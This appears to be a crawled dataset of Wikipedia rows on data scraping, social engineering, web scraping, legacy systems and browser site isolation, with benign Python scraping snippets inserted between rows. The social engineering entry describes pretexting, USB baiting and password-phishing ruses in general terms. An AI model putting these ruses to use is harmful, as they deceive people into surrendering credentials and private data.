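    # Hypothetical capture of a terminal window saved to disk beforehand.
    print(text_from_screenshot("terminal_capture.png"))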
7 Recently, companies have developed web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate the human processing that occurs when viewing a webpage to automatically extract useful information. 8 9 Large websites usually use defensive algorithms to protect their data from web scrapers and to limit the number of requests an IP or IP network may send. This has caused an ongoing battle between website developers and scraping developers. 10 Report mining is the extraction of data from human-readable computer reports. Conventional data extraction requires a connection to a working source system, suitable connectivity standards or an API, and usually complex querying. By using the source system's standard reporting options, and directing the output to a spool file instead of to a printer, static reports can be generated suitable for offline analysis via report mining. 11 This approach can avoid intensive CPU usage during business hours, can minimise end-user licence costs for ERP customers, and can offer very rapid prototyping and development of custom reports. Whereas data scraping and web scraping involve interacting with dynamic output, report mining involves extracting data from files in a human-readable format, such as HTML, PDF, or text. These can be easily generated from almost any system by intercepting the data feed to a printer. This approach can provide a quick and simple route to obtaining data without the need to program an API to the source system. |
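A minimal sketch of the report-mining idea described above: a spooled, fixed-width text report is loaded into a DataFrame for offline analysis with pandas, which this document already uses. The report content below is invented for illustration.

import pandas as pd
from io import StringIO

# Stand-in for a report that was directed to a spool file instead of a printer.
SPOOLED_REPORT = StringIO(
    "ACCOUNT     REGION      BALANCE\n"
    "10433       North        512.20\n"
    "10518       South       1890.05\n"
)

# read_fwf infers the fixed-width column boundaries typical of printer-bound reports.
df = pd.read_fwf(SPOOLED_REPORT)
print(df)
print("Total balance:", df["BALANCE"].sum())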
260 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Social_engineering_(security) | In the context of information security, social engineering is the psychological manipulation of people into performing actions or divulging confidential information. A type of confidence trick for the purpose of information gathering, fraud, or system access, it differs from a traditional "con" in the sense that it is often one of the many steps in a more complex fraud scheme. 1 It has also been defined as "any act that influences a person to take an action that may or may not be in their best interests. 2 Research done in 2020 has indicated that social engineering will be one of the most prominent challenges of the upcoming decade. Having proficiency in social engineering will be increasingly important for organizations and countries, due to the impact on geopolitics as well. Social engineering raises the question of whether our decisions will be accurately informed if our primary information is engineered and biased. 3 Social engineering attacks have been increasing in intensity and number, cementing the need for novel detection techniques and cyber security educational programs. 4 All social engineering techniques are based on attributes of human decision-making known as cognitive biases. 5 6 One example of social engineering is an individual who walks into a building and posts an official-looking announcement to the company bulletin that says the number for the help desk has changed. So, when employees call for help the individual asks them for their passwords and IDs thereby gaining the ability to access the company's private information. Another example of social engineering would be that the hacker contacts the target on a social networking site and starts a conversation with the target. Gradually the hacker gains the trust of the target and then uses that trust to get access to sensitive information like password or bank account details. 7 Pretexting (adj. pretextual), also known in the UK as blagging, 8 is the act of creating and using an invented scenario (the pretext) to engage a targeted victim in a manner that increases the chance the victim will divulge information or perform actions that would be unlikely in ordinary circumstances. 9 An elaborate lie, it most often involves some prior research or setup and the use of this information for impersonation (e.g., date of birth, Social Security number, last bill amount) to establish legitimacy in the mind of the target. 10 Water holing is a targeted social engineering strategy that capitalizes on the trust users have in websites they regularly visit. The victim feels safe to do things they would not do in a different situation. A wary person might, for example, purposefully avoid clicking a link in an unsolicited email, but the same person would not hesitate to follow a link on a website they often visit. So, the attacker prepares a trap for the unwary prey at a favored watering hole. This strategy has been successfully used to gain access to some (supposedly) very secure systems. 11 Baiting is like the real-world Trojan horse that uses physical media and relies on the curiosity or greed of the victim. 12 In this attack, attackers leave malware-infected floppy disks, CD-ROMs, or USB flash drives in locations people will find them (bathrooms, elevators, sidewalks, parking lots, etc.), give them legitimate and curiosity-piquing labels, and wait for victims. 
Unless computer controls block infections, inserting the media compromises PCs that "auto-run" it. Hostile devices can also be used. 13 For instance, a "lucky winner" is sent a free digital audio player compromising any computer it is plugged into. A "road apple" (the colloquial term for horse manure, suggesting the device's undesirable nature) is any removable media with malicious software left in opportunistic or conspicuous places. It may be a CD, DVD, or USB flash drive, among other media. Curious people take it and plug it into a computer, infecting the host and any attached networks. Again, hackers may give them enticing labels, such as "Employee Salaries" or "Confidential". 14 One study published in 2016 had researchers drop 297 USB drives around the campus of the University of Illinois. The drives contained files on them that linked to webpages owned by the researchers. The researchers were able to see how many of the drives had files on them opened, but not how many were inserted into a computer without having a file opened. Of the 297 drives that were dropped, 290 (98%) of them were picked up and 135 (45%) of them "called home". 15 In common law, pretexting is an invasion of privacy tort of appropriation. 16 In December 2006, United States Congress approved a Senate-sponsored bill making the pretexting of telephone records a federal felony with fines of up to $250,000 and ten years in prison for individuals (or fines of up to $500,000 for companies). It was signed by President George W. Bush on 12 January 2007. 17 The 1999 Gramm-Leach-Bliley Act (GLBA) is a U.S. Federal law that specifically addresses pretexting of banking records as an illegal act punishable under federal statutes. When a business entity such as a private investigator, SIU insurance investigator, or an adjuster conducts any type of deception, it falls under the authority of the Federal Trade Commission (FTC). This federal agency has the obligation and authority to ensure that consumers are not subjected to any unfair or deceptive business practices. US Federal Trade Commission Act, Section 5 of the FTCA states, in part: "Whenever the Commission shall have reason to believe that any such person, partnership, or corporation has been or is using any unfair method of competition or unfair or deceptive act or practice in or affecting commerce, and if it shall appear to the Commission that a proceeding by it in respect thereof would be to the interest of the public, it shall issue and serve upon such person, partnership, or corporation a complaint stating its charges in that respect." The statute states that when someone obtains any personal, non-public information from a financial institution or the consumer, their action is subject to the statute. It relates to the consumer's relationship with the financial institution. For example, a pretexter using false pretenses either to get a consumer's address from the consumer's bank, or to get a consumer to disclose the name of their bank, would be covered. The determining principle is that pretexting only occurs when information is obtained through false pretenses. While the sale of cell telephone records has gained significant media attention, and telecommunications records are the focus of the two bills currently before the United States Senate, many other types of private records are being bought and sold in the public market. Alongside many advertisements for cell phone records, wireline records and the records associated with calling cards are advertised. 
As individuals shift to VoIP telephones, it is safe to assume that those records will be offered for sale as well. Currently, it is legal to sell telephone records, but illegal to obtain them. 18 U.S. Rep. Fred Upton (R-Kalamazoo, Michigan), chairman of the Energy and Commerce Subcommittee on Telecommunications and the Internet, expressed concern over the easy access to personal mobile phone records on the Internet during a House Energy Commerce Committee hearing on "Phone Records For Sale: Why Aren't Phone Records Safe From Pretexting?" Illinois became the first state to sue an online records broker when Attorney General Lisa Madigan sued 1st Source Information Specialists, Inc., a spokeswoman for Madigan's office said. The Florida-based company operates several Web sites that sell mobile telephone records, according to a copy of the suit. The attorneys general of Florida and Missouri quickly followed Madigan's lead, filing suits, respectively, against 1st Source Information Specialists and, in Missouri's case, one other records broker, First Data Solutions, Inc. Several wireless providers, including T-Mobile, Verizon, and Cingular, filed earlier lawsuits against records brokers, with Cingular winning an injunction against First Data Solutions and 1st Source Information Specialists. U.S. Senator Charles Schumer (D-New York) introduced legislation in February 2006 aimed at curbing the practice. The Consumer Telephone Records Protection Act of 2006 would create felony criminal penalties for stealing and selling the records of mobile phone, landline, and Voice over Internet Protocol (VoIP) subscribers. Patricia Dunn, former chairwoman of Hewlett-Packard, reported that the HP board hired a private investigation company to delve into who was responsible for leaks within the board. Dunn acknowledged that the company used the practice of pretexting to solicit the telephone records of board members and journalists. Chairman Dunn later apologized for this act and offered to step down from the board if it was desired by board members. 19 Unlike Federal law, California law specifically forbids such pretexting. The four felony charges brought against Dunn were dismissed. 20 Following the 2017 Equifax data breach in which over 150 million private records were leaked (including Social Security numbers, driver's license numbers, birthdates, etc.), warnings were sent out regarding the dangers of impending security risks. 21 In the days after the establishment of a legitimate help website (equifaxsecurity2017.com) dedicated to people potentially victimized by the breach, 194 malicious domains were reserved, based on small variations of the URL, capitalizing on the likelihood of people mistyping. 22 23 During the 2016 United States elections, hackers associated with Russian military intelligence (GRU) sent phishing emails directed to members of Hillary Clinton's campaign, disguised as a Google alert. 24 Many members, including the chairman of the campaign, John Podesta, had entered their passwords thinking their passwords would be reset, causing their personal information, and thousands of private emails and documents, to be leaked. 25 With this information, they hacked into other computers in the Democratic Congressional Campaign Committee, implanting malware in them, which caused their computer activities to be monitored and leaked. 
25 Susan Headley became involved in phreaking with Kevin Mitnick and Lewis de Payne in Los Angeles, but later framed them for erasing the system files at US Leasing after a falling out, leading to Mitnick's first conviction. She retired to professional poker. 26 Mike Ridpath is a security consultant, published author, speaker and previous member of w00w00. He is well known for developing techniques and tactics for social engineering through cold calling. He became well known for live demonstrations as well as playing recorded calls after talks where he explained his thought process on what he was doing to get passwords through the phone. 27 28 29 30 31 As a child, Ridpath was connected with the Badir Brothers and was widely known within the phreaking and hacking community for his articles with popular underground ezines, such as Phrack, B4B0 and 9x on modifying Oki 900s, blueboxing, satellite hacking and RCMAC. 32 33 Brothers Ramy, Muzher, and Shadde Badir—all of whom were blind from birth—managed to set up an extensive phone and computer fraud scheme in Israel in the 1990s using social engineering, voice impersonation, and Braille-display computers. 34 35 Christopher J. Hadnagy is an American social engineer and information technology security consultant. He is best known as the author of four books on social engineering and cyber security 36 37 38 39 and founder of the Innocent Lives Foundation, an organization that helps track and identify child trafficking by seeking the assistance of information security specialists, using data from open-source intelligence (OSINT) and collaborating with law enforcement. 40 41 |
261 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_scraping#cite_ref-31 | Web scraping, web harvesting, or web data extraction is data scraping used for extracting data from websites. 1 Web scraping software may directly access the World Wide Web using the Hypertext Transfer Protocol or a web browser. While web scraping can be done manually by a software user, the term typically refers to automated processes implemented using a bot or web crawler. It is a form of copying in which specific data is gathered and copied from the web, typically into a central local database or spreadsheet, for later retrieval or analysis. Scraping a web page involves fetching it and extracting data from it. Fetching is the downloading of a page (which a browser does when a user views a page). Therefore, web crawling is a main component of web scraping, to fetch pages for later processing. Once fetched, extraction can take place. The content of a page may be parsed, searched and reformatted, and its data copied into a spreadsheet or loaded into a database. Web scrapers typically take something out of a page, to make use of it for another purpose somewhere else. An example would be finding and copying names and telephone numbers, companies and their URLs, or e-mail addresses to a list (contact scraping). As well as contact scraping, web scraping is used as a component of applications used for web indexing, web mining and data mining, online price change monitoring and price comparison, product review scraping (to watch the competition), gathering real estate listings, weather data monitoring, website change detection, research, tracking online presence and reputation, web mashup, and web data integration. Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. As a result, specialized tools and software have been developed to facilitate the scraping of web pages. Web scraping applications include market research, price comparison, content monitoring, and more. Businesses rely on web scraping services to efficiently gather and utilize this data. Newer forms of web scraping involve monitoring data feeds from web servers. For example, JSON is commonly used as a transport mechanism between the client and the web server. There are methods that some websites use to prevent web scraping, such as detecting and disallowing bots from crawling (viewing) their pages. In response, there are web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate human browsing to enable gathering web page content for offline parsing. Web scraping is the process of automatically mining data or collecting information from the World Wide Web. It is a field with active developments sharing a common goal with the semantic web vision, an ambitious initiative that still requires breakthroughs in text processing, semantic understanding, artificial intelligence and human-computer interactions. The simplest form of web scraping is manually copying and pasting data from a web page into a text file or spreadsheet. Sometimes even the best web-scraping technology cannot replace a human's manual examination and copy-and-paste, and sometimes this may be the only workable solution when the websites for scraping explicitly set up barriers to prevent machine automation. 
A simple yet powerful approach to extract information from web pages can be based on the UNIX grep command or regular expression-matching facilities of programming languages (for instance Perl or Python). Static and dynamic web pages can be retrieved by posting HTTP requests to the remote web server using socket programming. Many websites have large collections of pages generated dynamically from an underlying structured source like a database. Data of the same category are typically encoded into similar pages by a common script or template. In data mining, a program that detects such templates in a particular information source, extracts its content, and translates it into a relational form, is called a wrapper. Wrapper generation algorithms assume that input pages of a wrapper induction system conform to a common template and that they can be easily identified in terms of a common URL scheme. 3 Moreover, some semi-structured data query languages, such as XQuery and HTQL, can be used to parse HTML pages and to retrieve and transform page content. By embedding a full-fledged web browser, such as the Internet Explorer or Mozilla browser control, programs can retrieve the dynamic content generated by client-side scripts. These browser controls also parse web pages into a DOM tree, based on which programs can retrieve parts of the pages. Languages such as XPath can be used to parse the resulting DOM tree. There are several companies that have developed vertical-specific harvesting platforms. These platforms create and monitor a multitude of "bots" for specific verticals with no "man in the loop" (no direct human involvement), and no work related to a specific target site. The preparation involves establishing the knowledge base for the entire vertical and then the platform creates the bots automatically. The platform's robustness is measured by the quality of the information it retrieves (usually the number of fields) and its scalability (how quickly it can scale up to hundreds or thousands of sites). This scalability is mostly used to target the Long Tail of sites that common aggregators find complicated or too labor-intensive to harvest content from. The pages being scraped may embrace metadata or semantic markups and annotations, which can be used to locate specific data snippets. If the annotations are embedded in the pages, as Microformat does, this technique can be viewed as a special case of DOM parsing. In another case, the annotations, organized into a semantic layer, 4 are stored and managed separately from the web pages, so the scrapers can retrieve data schema and instructions from this layer before scraping the pages. There are efforts using machine learning and computer vision that attempt to identify and extract information from web pages by interpreting pages visually as a human being might. 5 Some newer systems use advanced AI to interpret and process web page content contextually, extracting relevant information, transforming data, and customizing outputs based on the content's structure and meaning. This method enables more intelligent and flexible data extraction, accommodating complex and dynamic web content. The world of web scraping offers a variety of software tools designed to simplify and customize the process of data extraction from websites. These tools vary in their approach and capabilities, making web scraping accessible to both novice users and advanced programmers. 
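The grep-style, regular-expression approach mentioned at the start of this entry can be sketched with Python's standard re module. The HTML snippet and pattern below are invented for illustration; real pages are usually better handled with a proper HTML parser.

import re

# Invented fragment standing in for a fetched page.
SAMPLE_HTML = """
<ul>
  <li><a href="/item/1">Widget A</a> $19.99</li>
  <li><a href="/item/2">Widget B</a> $24.50</li>
</ul>
"""

# Capture the link text and the price that follows each anchor tag.
PATTERN = re.compile(r'<a href="[^"]+">([^<]+)</a>\s*\$(\d+\.\d{2})')

for name, price in PATTERN.findall(SAMPLE_HTML):
    print(name, float(price))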
|
262 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Category:Short_description_matches_Wikidata | This category contains articles whose short description matches the description field of the corresponding Wikidata item. No action is needed. This is a tracking category only. The following 200 pages are in this category, out of approximately 2,038,644 total. This list may not reflect recent changes. |
263 | https://en.wikipedia.org/wiki/Data_scraping | https://web.archive.org/web/20160304205109/http://connection.ebscohost.com/c/product-reviews/2235513/data-pump-transforms-host-data | Reports on Datawatch Corp.'s introduction of version 3.0 of its Monarch report software, a data access and analysis tool that lets users view, query, and analyze data from legacy and personal computer systems. Features of the new version; System of operation; Security features; List price. Reports on Datawatch Corp.'s release of an upgraded version of DataSync database middleware tool. Ability to let users selectively download data from a database server; Inclusion of DataSync Development Tool that defines subsets and determines synchronization rules; DataSync Agent's performance... Reports on the shipping of Datawatch Corp.'s DataSync 2.0 for distributing and synchronizing data between database servers and remote personal computer clients. Product description; Pricing; Contact information. Reviews the enterprise reporting software Monarch ES 2.0 from Datawatch Corporation. Reviews Datawatch Corporation's Virex 5.0 software. Reviews the computer software Virex 5.5.1 from Datawatch Corporation. Focuses on Datawatch Corp.'s Monarch 3.04 data-extraction computer software. Ability to store and navigate report information; Usability; Product support; Price; Contact information. The article offers information on the Managed Analytics Platform computer software from American software company Datawatch Corp. The article reviews the computer software Monarch Data Pump from Datawatch Corporation. |
264 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Legacy_system | In computing, a legacy system is an old method, technology, computer system, or application program, "of, relating to, or being a previous or outdated computer system", 1 yet still in use. Often referencing a system as "legacy" means that it paved the way for the standards that would follow it. This can also imply that the system is out of date or in need of replacement. Legacy code is old computer source code that is no longer supported on standard hardware and environments, and is a codebase that is in some respect obsolete or supporting something obsolete. Legacy code may be written in programming languages, use frameworks and external libraries, or use architecture and patterns that are no longer considered modern, increasing the mental burden and ramp-up time for software engineers who work on the codebase. Legacy code may have zero or insufficient automated tests, making refactoring dangerous and likely to introduce bugs. 2 Long-lived code is susceptible to software rot, where changes to the runtime environment, or surrounding software or hardware may require maintenance or emulation of some kind to keep working. Legacy code may be present to support legacy hardware, a separate legacy system, or a legacy customer using an old feature or software version. While the term usually refers to source code, it can also apply to executable code that no longer runs on a later version of a system, or requires a compatibility layer to do so. An example would be a classic Macintosh application which will not run natively on macOS, but runs inside the Classic environment, or a Win16 application running on Windows XP using the Windows on Windows feature in XP. An example of legacy hardware are legacy ports like PS 2 and VGA ports, and CPUs with older, incompatible instruction sets (with e.g. newer operating systems). Examples in legacy software include legacy file formats like .swf for Adobe Flash or .123 for Lotus 1 2 3, and text files encoded with legacy character encodings like EBCDIC. The first use of the term legacy to describe computer systems probably occurred in the 1960s. 3 By the 1980s it was commonly used to refer to existing computer systems to distinguish them from the design and implementation of new systems. Legacy was often heard during a conversion process, for example, when moving data from the legacy system to a new database. While this term may indicate that some engineers may feel that a system is out of date, a legacy system can continue to be used for a variety of reasons. It may simply be that the system still provides for the users' needs. In addition, the decision to keep an old system may be influenced by economic reasons such as return on investment challenges or vendor lock-in, the inherent challenges of change management, or a variety of other reasons other than functionality. Backward compatibility (such as the ability of newer systems to handle legacy file formats and character encodings) is a goal that software developers often include in their work. Even if a legacy system is no longer used, it may continue to impact the organization due to its historical role. Historic data may not have been converted into the new system format and may exist within the new system with the use of a customized schema crosswalk, or may exist only in a data warehouse. In either case, the effect on business intelligence and operational reporting can be significant. 
A legacy system may include procedures or terminology which are no longer relevant in the current context, and may hinder or confuse understanding of the methods or technologies used. Organizations can have compelling reasons for keeping a legacy system, such as: Legacy systems are considered to be potentially problematic by some software engineers for several reasons. 4 Where it is impossible to replace legacy systems through the practice of application retirement, it is still possible to enhance (or "re-face") them. Most development often goes into adding new interfaces to a legacy system. The most prominent technique is to provide a Web-based interface to a terminal-based mainframe application. This may reduce staff productivity due to slower response times and slower mouse-based operator actions, yet it is often seen as an "upgrade", because the interface style is familiar to unskilled users and is easy for them to use. John McCormick discusses such strategies that involve middleware. 10 Printing improvements are problematic because legacy software systems often add no formatting instructions, or they use protocols that are not usable in modern PC Windows printers. A print server can be used to intercept the data and translate it to a more modern code. Rich Text Format (RTF) or PostScript documents may be created in the legacy application and then interpreted at a PC before being printed. Biometric security measures are difficult to implement on legacy systems. A workable solution is to use a Telnet or HTTP proxy server to sit between users and the mainframe to implement secure access to the legacy application. The change being undertaken in some organizations is to switch to automated business process (ABP) software which generates complete systems. These systems can then interface to the organizations' legacy systems and use them as data repositories. This approach can provide a number of significant benefits: the users are insulated from the inefficiencies of their legacy systems, and the changes can be incorporated quickly and easily in the ABP software. Model-driven reverse and forward engineering approaches can be also used for the improvement of legacy software. 11 Andreas M. Hein researched the use of legacy systems in space exploration at the Technical University of Munich. According to Hein, legacy systems are attractive for reuse if an organization has the capabilities for verification, validation, testing, and operational history. 12 13 These capabilities must be integrated into various software life cycle phases such as development, implementation, usage, or maintenance. For software systems, the capability to use and maintain the system are crucial. Otherwise the system will become less and less understandable and maintainable. According to Hein, verification, validation, testing, and operational history increases the confidence in a system's reliability and quality. However, accumulating this history is often expensive. NASA's now retired Space Shuttle program used a large amount of 1970s-era technology. Replacement was cost-prohibitive because of the expensive requirement for flight certification. The original hardware completed the expensive integration and certification requirement for flight, but any new equipment would have had to go through that entire process again. This long and detailed process required extensive tests of the new components in their new configurations before a single unit could be used in the Space Shuttle program. 
Thus any new system that started the certification process would become a de facto legacy system by the time it was approved for flight. Additionally, the entire Space Shuttle system, including ground and launch vehicle assets, was designed to work together as a closed system. Since the specifications did not change, all of the certified systems and components performed well in the roles for which they were designed. 14 Even before the Shuttle was scheduled to be retired in 2010, NASA found it advantageous to keep using many pieces of 1970s technology rather than to upgrade those systems and recertify the new components. Some in the software engineering community prefer to describe "legacy code" without the connotation of being obsolete. Among the most prevalent neutral conceptions are source code inherited from someone else and source code inherited from an older version of the software. Eli Lopian, CEO of Typemock, has defined it as "code that developers are afraid to change". 15 Michael Feathers 16 introduced a definition of legacy code as code without tests, which reflects the perspective of legacy code being difficult to work with in part due to a lack of automated regression tests. He also defined characterization tests to start putting legacy code under test. Ginny Hendry characterized creation of code as a challenge to current coders to create code that is "like other legacies in our lives—like the antiques, heirlooms, and stories that are cherished and lovingly passed down from one generation to the next. What if legacy code was something we took pride in?" 17 The term legacy support is often used in conjunction with legacy systems. The term may refer to a feature of modern software. For example, operating systems with "legacy support" can detect and use older hardware. The term may also be used to refer to a business function; e.g. a software or hardware vendor that is supporting, or providing software maintenance, for older products. A "legacy" product may be a product that is no longer sold, has lost substantial market share, or is a version of a product that is not current. A legacy product may have some advantage over a modern product making it appealing for customers to keep it around. A product is only truly "obsolete" if it has an advantage to nobody—if no person making a rational decision would choose to acquire it new. The term "legacy mode" often refers specifically to backward compatibility. A software product that is capable of performing as though it were a previous version of itself, is said to be "running in legacy mode". This kind of feature is common in operating systems and internet browsers, where many applications depend on these underlying components. The computer mainframe era saw many applications running in legacy mode. In the modern business computing environment, n-tier, or 3-tier, architectures are more difficult to place into legacy mode as they include many components making up a single system. Virtualization technology is a recent innovation allowing legacy systems to continue to operate on modern hardware by running older operating systems and browsers on a software system that emulates legacy hardware. Programmers have borrowed the term brownfield from the construction industry, where previously developed land (often polluted and abandoned) is described as brownfield. 
18 There is an alternate favorable opinion—growing since the end of the Dotcom bubble in 1999—that legacy systems are simply computer systems in working use: "Legacy code" often differs from its suggested alternative by actually working and scaling. IT analysts estimate that the cost of replacing business logic is about five times that of reuse, 19 even discounting the risk of system failures and security breaches. Ideally, businesses would never have to rewrite most core business logic: debits and credits are a perennial requirement. The IT industry is responding with "legacy modernization" and "legacy transformation": refurbishing existing business logic with new user interfaces, sometimes using screen scraping and service-enabled access through web services. These techniques allow organizations to understand their existing code assets (using discovery tools), provide new user and application interfaces to existing code, improve workflow, contain costs, minimize risk, and enjoy classic qualities of service (near 100% uptime, security, scalability, etc.). 20 This trend also invites reflection on what makes legacy systems so durable. Technologists are relearning the importance of sound architecture from the start, to avoid costly and risky rewrites. The most common legacy systems tend to be those which embraced well-known IT architectural principles, with careful planning and strict methodology during implementation. Poorly designed systems often don't last, both because they wear out and because their inherent faults invite replacement. Thus, many organizations are rediscovering the value of both their legacy systems and the theoretical underpinnings of those systems. |
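The "legacy modernization" approach described above often amounts to screen scraping a legacy report or terminal screen and re-exposing it through a web service. The sketch below illustrates that pattern in minimal form, in the spirit of the scraping utilities earlier in this notebook; the fixed-width report layout, the column offsets, and the /accounts endpoint are all hypothetical, so treat this as the shape of the approach rather than a recipe for any particular system.
from http.server import BaseHTTPRequestHandler, HTTPServer
import json
# Hypothetical example: a fixed-width report as a legacy terminal application might print it.
LEGACY_REPORT = (
    "ACCT00123  SMITH, JOHN       CREDIT   150.00\n"
    "ACCT00456  DOE, JANE         DEBIT     75.50\n"
)
def parse_legacy_report(text):
    """Screen-scrape fixed-width rows into dictionaries (column offsets are assumed)."""
    records = []
    for line in text.splitlines():
        if not line.strip():
            continue
        records.append({
            "account": line[0:9].strip(),
            "name": line[11:28].strip(),
            "type": line[29:37].strip(),
            "amount": float(line[37:].strip()),
        })
    return records
class LegacyFacade(BaseHTTPRequestHandler):
    """Minimal JSON facade: modern clients call GET /accounts instead of reading the terminal screen."""
    def do_GET(self):
        if self.path == "/accounts":
            body = json.dumps(parse_legacy_report(LEGACY_REPORT)).encode()
            self.send_response(200)
            self.send_header("Content-Type", "application/json")
            self.end_headers()
            self.wfile.write(body)
        else:
            self.send_error(404)
if __name__ == "__main__":
    HTTPServer(("127.0.0.1", 8080), LegacyFacade).serve_forever()
A real facade would read from the live legacy application (for example over Telnet or a print stream) instead of a hard-coded string, but the scrape-then-serve structure stays the same.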
265 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Site_isolation | Site isolation is a feature in certain web browsers that allows cross-origin sites to be isolated from each other. The feature was originally proposed by Charles Reis and others, with subsequent iterations from Microsoft in the form of its implementation of the feature in the Gazelle research browser. However, the feature failed to gain traction due to issues surrounding its implementation and performance concerns. In 2018, following the disclosure of the Spectre and Meltdown vulnerabilities to the public, Google started work on adding site isolation to Chrome, eventually culminating in a 2019 release of the feature. In 2021, Firefox also launched its own version of site isolation, which it had been developing under the codename Project Fission. Despite the security benefits of this feature, researchers have also found security issues surrounding various aspects of it. These include issues with the perceived protection against transient attacks such as Spectre and Meltdown, as well as new timing and resource-exhaustion attacks enabled by this feature. Until 2017, the predominant security architecture of major browsers adhered to the process-per-browsing-instance model. This entailed the browser comprising distinct sandboxed processes, including the browser process, GPU process, networking process, and rendering process. The rendering process would engage with other privileged services when necessary to execute elevated actions when viewing a web page. 1 2 Although this model successfully prevented problems associated with malicious JavaScript gaining access to the operating system, it lacked the capability to isolate websites from each other adequately. 3 Despite these concerns, the adoption of a more robust model faced limited traction due to perceived issues with newer models, particularly those related to performance and memory. 4 5 The disclosure of the Spectre and Meltdown exploits in 2017, however, altered this landscape. Previously, accessing arbitrary memory was complicated, requiring a compromised renderer. With Spectre, however, attacks were developed that abused JavaScript features to read almost all memory in the rendering process, including memory storing potentially sensitive information from previously rendered cross-origin pages. 6 7 This exposed the issues of the process-per-instance security model. Consequently, a new security architecture that allowed the separation of the rendering of different web pages into entirely isolated processes was required. 8 7 In 2009, Reis et al. proposed the first version of the process-per-site model to isolate web pages based on the page's web origin. 9 This was improved upon in 2009 by the Gazelle research browser, which separated specific document frames based on their web principal, a security barrier that corresponded with the specific document that was being loaded. 10 11 Around the same time, work was also being done on the OP (which would later become the OP2 browser), IBOS, Tahoma, and SubOS browsers, all of which proposed different paradigms to solve the issue of process separation amongst sites. 12 13 In 2019, Reis et al. of the Google Chrome project presented a paper at USENIX Security 14 that detailed changes to their existing browser security model in response to the recent research proving that the Spectre attack could be used inside the rendering process of the browser. 
15 16 The paper proposed changes to the model that borrowed from Reis et al.'s work in 2009. 17 Chrome's implementation of site isolation would use web origins as a primary differentiator of a 'site' at a process level. 18 19 Additionally, the Chrome team also implemented the idea of website frames being executed out of process, a feature that had been suggested by the authors of the Gazelle web browser, as well as the OP and OP2 web browsers. 12 This required a significant re-engineering of Chrome's process-handling code, involving more than 4,000 commits from 320 contributors over a period of five years. 20 Chrome's implementation of site isolation allowed it to eliminate multiple universal cross-site scripting (uXSS) attacks. 21 uXSS attacks allow attackers to compromise the same-origin policy, granting unrestricted access to inject and load attacker-controlled JavaScript on other websites. 22 The Chrome team found that all 94 uXSS attacks reported between 2014 and 2018 would be rendered ineffective by the deployment of site isolation. 23 In addition to this, the Chrome team also claimed that their implementation of site isolation would be effective at preventing variations of the Spectre and Meltdown group of timing attacks that relied on the victim address space being in the same process as the attacker process. 16 In March 2021, the Firefox development team announced that they would also roll out their implementation of site isolation. This feature had been in development for multiple months under the codename Project Fission. 24 Firefox's implementation fixed a few of the flaws that had been found in Chrome's implementation, namely the fact that similar web pages were still vulnerable to uXSS attacks. 25 26 The project also required a rewrite of the process-handling code in Firefox. 27 Before 2019, site isolation had only been implemented by research browsers. Site isolation was considered to be resource-intensive 5 due to an increase in the amount of memory space taken up by the processes. 28 This performance overhead was reflected in real-world implementations as well. 29 Chrome's implementation of site isolation on average used one to two cores more than the same browser without site isolation. 5 Additionally, engineers working on the site isolation project observed a 10 to 13 percent increase in memory usage when site isolation was used. 30 31 Chrome was the industry's first major web browser to adopt site isolation as a defense against uXSS and transient execution attacks. 32 To do this, the Chrome team overcame multiple performance and compatibility hurdles, and in doing so, kickstarted an industry-wide effort to improve browser security. However, despite this, certain aspects of its Spectre defenses have been found lacking. 6 In particular, site isolation's ability to defend against timing attacks has been found to be incomplete. 33 In 2021, Agarwal et al. were able to develop an exploit called Spook.js that was able to break Chrome's Spectre defenses and exfiltrate data across web pages in different origins. 34 In the same year, researchers at Microsoft were able to leverage site isolation to perform a variety of timing attacks that allowed them to leak cross-origin information by carefully manipulating the inter-process communication protocols employed by site isolation. 35 In 2023, researchers at Ruhr University Bochum showed that they were able to leverage the process architecture required by site isolation to exhaust system resources and also perform advanced attacks like DNS poisoning. 
36 |
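The Chrome design described in the row above keys process assignment to a page's "site", which is coarser than a full origin—roughly the URL scheme plus the registrable domain. As a rough, standard-library-only illustration of that grouping, the helper below reduces URLs to such a key so that same-site documents map to the same value while cross-site documents do not; the name site_key and the last-two-labels shortcut are assumptions for illustration, since production browsers consult the Public Suffix List.
from urllib.parse import urlsplit
def site_key(url):
    """Approximate the 'site' used for process isolation: scheme plus registrable domain.
    Real implementations consult the Public Suffix List; taking the last two host
    labels is only a rough stand-in for illustration."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    labels = host.split(".")
    registrable = ".".join(labels[-2:]) if len(labels) >= 2 else host
    return f"{parts.scheme}://{registrable}"
# Documents whose site keys match may share a renderer process under this scheme;
# differing keys indicate cross-site documents that site isolation keeps apart.
print(site_key("https://mail.example.com/inbox"))   # https://example.com
print(site_key("https://docs.example.com/view"))    # https://example.com (same site)
print(site_key("https://attacker.test/page"))       # https://attacker.test (different site)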
266 | https://en.wikipedia.org/wiki/Web_scraping | https://foundation.wikimedia.org/wiki/Special:MyLanguage/Policy:Privacy_policy | It may not be circumvented, eroded, or ignored by Wikimedia Foundation officers or staff nor local policies of any Wikimedia project. Because we believe that you should not have to provide personal information to participate in the free knowledge movement, you may: Because we want to understand how Wikimedia Sites are used so we can make them better for you, we collect some information when you: We are committed to: Be aware: The Wikimedia Foundation is the nonprofit organization that operates collaborative, free knowledge websites, like Wikipedia, Wikimedia Commons, and Wiktionary. This Policy explains how we collect, use, and share your Personal Information. By using Wikimedia Sites, you consent to this Policy. The Wikimedia movement is founded on a simple, but powerful principle: we can do more together than any of us can do alone. We cannot work collectively without gathering, sharing, and analyzing information about our users as we seek new ways to make the Wikimedia Sites more usable, safer, and more beneficial. We believe that information-gathering and use should go hand-in-hand with transparency. This Privacy Policy explains how the Wikimedia Foundation, the non-profit organization that hosts the Wikimedia Sites, like Wikipedia, collects, uses, and shares information we receive from you through your use of the Wikimedia Sites. It is essential to understand that, by using any of the Wikimedia Sites, you consent to the collection, transfer, processing, storage, disclosure, and use of your information as described in this Privacy Policy. That means that reading this Policy carefully is important. We believe that you should not have to provide nonpublic Personal Information to participate in the free 